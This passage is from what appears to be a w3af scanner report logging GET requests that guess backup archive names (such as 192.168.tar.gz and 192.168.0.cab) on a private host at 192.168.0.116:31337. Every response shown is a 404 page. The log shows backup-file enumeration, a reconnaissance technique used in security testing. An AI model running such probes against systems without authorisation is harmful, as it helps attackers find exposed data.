&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="212">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="212">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="213">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="214">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="215">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="216">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="216">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="217">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="218">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="220">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="221">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="222">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="223">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="224">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="225">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="226">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="227">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="228">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="228">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="229">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="229">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="230">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="231">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="231">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="233">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="235">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
